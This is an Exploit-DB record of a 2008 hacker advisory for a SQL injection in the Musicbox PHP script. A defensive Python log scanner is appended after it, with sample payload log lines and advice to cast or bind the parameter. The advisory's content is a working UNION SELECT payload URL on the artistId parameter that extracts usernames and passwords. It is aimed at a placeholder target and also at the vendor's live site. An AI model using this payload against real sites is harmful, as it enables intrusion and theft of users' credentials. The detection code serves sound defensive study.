Musicbox <= 2.3.7 artistId Remote SQL Injection Vulnerability

2008-05-07T00:00:00
ID EDB-ID:5560
Type exploitdb
Reporter HaCkeR_EgY
Modified 2008-05-07T00:00:00

Description

Remote SQL injection in Musicbox <= 2.3.7 through the artistId parameter of viewalbums.php (CVE-2008-2125). Webapps exploit for the PHP platform.

                                        
########################################
#    Rem0te SQL Injection Vulnerability                           #
#       Musicbox [viewalbums.php]                                 #
########################################

[<>] Author: HaCkeR-EgY

[<>] H^0mE: www.pal-hacker.com , atsdp.com

[<>] CONTact: hacker_EGY@hotmail.com
===========================================================
[<>] Script : Musicbox

[<>] version : Version 2.3.6 / 2.3.7

[<>] Script Price: Only $ 255.00

[<>] Download : www.musicboxv2.com
============================================================

[<>] D0RK : ... you know

[<>] ExPLO!t :
             
  ===>
http://www.target.com/version2.3.7/viewalbums.php?artistId=-1/**/union/**/select/**/1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10/**/from/**/users/*
 
 
[<>] live DemO :

  ===>
  http://www.musicboxv2.com/version2.3.7/viewalbums.php?artistId=-1/**/union/**/select/**/1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10/**/from/**/users/*
 
==============================================================
[<>] Thanx : MY Brotha and MY Master " Abo Mohamed "

[<>] Greetz : F!resell , Mohamed el Arab ,Mr.EXE , DaRk MaStEr ,H-T Team
                   Gold_M , V4 Team , Jiki Team  , RoMaNcYxHaCkEr
===============================================================

# milw0rm.com [2008-05-07]
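
Added example (not part of the original advisory and not Musicbox code): a log check a defender could run to find requests of the kind shown above. It assumes artistId is a plain numeric identifier in normal use, flags viewalbums.php requests where it is not, and collapses /**/ comments before looking for UNION SELECT. The log lines are constructed samples and the function names are illustrative.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); IPs are documentation addresses.
SAMPLE_LOG = [
    '192.0.2.10 - - [07/May/2008:10:00:01 +0000] "GET /version2.3.7/viewalbums.php?artistId=12 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [07/May/2008:10:00:09 +0000] "GET /version2.3.7/viewalbums.php?artistId=-1/**/union/**/select/**/1,2,3/**/from/**/users/* HTTP/1.1" 200 6210',
    '192.0.2.44 - - [07/May/2008:10:00:12 +0000] "GET /version2.3.7/viewalbums.php?artistId=-1%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F1 HTTP/1.1" 200 6100',
    '192.0.2.77 - - [07/May/2008:10:00:15 +0000] "GET /version2.3.7/viewalbums.php?artistId=12%27 HTTP/1.1" 200 310',
    '192.0.2.10 - - [07/May/2008:10:00:20 +0000] "GET /version2.3.7/index.php?artistId=abc HTTP/1.1" 200 900',
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
COMMENT = re.compile(r"/\*.*?\*/", re.S)           # inline SQL comments used as spaces
UNION = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)

def classify(value):
    """Return 'ok', 'union_select' or 'non_integer' for one decoded artistId value."""
    if re.fullmatch(r"[0-9]+", value):              # assumption: legitimate ids are digits only
        return "ok"
    collapsed = COMMENT.sub(" ", value)             # '-1/**/union/**/select' -> '-1 union select'
    return "union_select" if UNION.search(collapsed) else "non_integer"

def scan(lines, script="viewalbums.php", param="artistId"):
    """Yield (client, verdict, decoded_value) for suspicious requests to the script."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + script):
            continue
        # parse_qs percent-decodes, so encoded and plain payloads compare equal
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            verdict = classify(value)
            if verdict != "ok":
                hits.append((client, verdict, value))
    return hits

if __name__ == "__main__":
    for client, verdict, value in scan(SAMPLE_LOG):
        print(f"{client}\t{verdict}\t{value}")
```

Any hit is also a sign that the parameter reaches the query unvalidated; casting artistId to an integer or binding it in a prepared statement on the server side removes the condition the detection looks for.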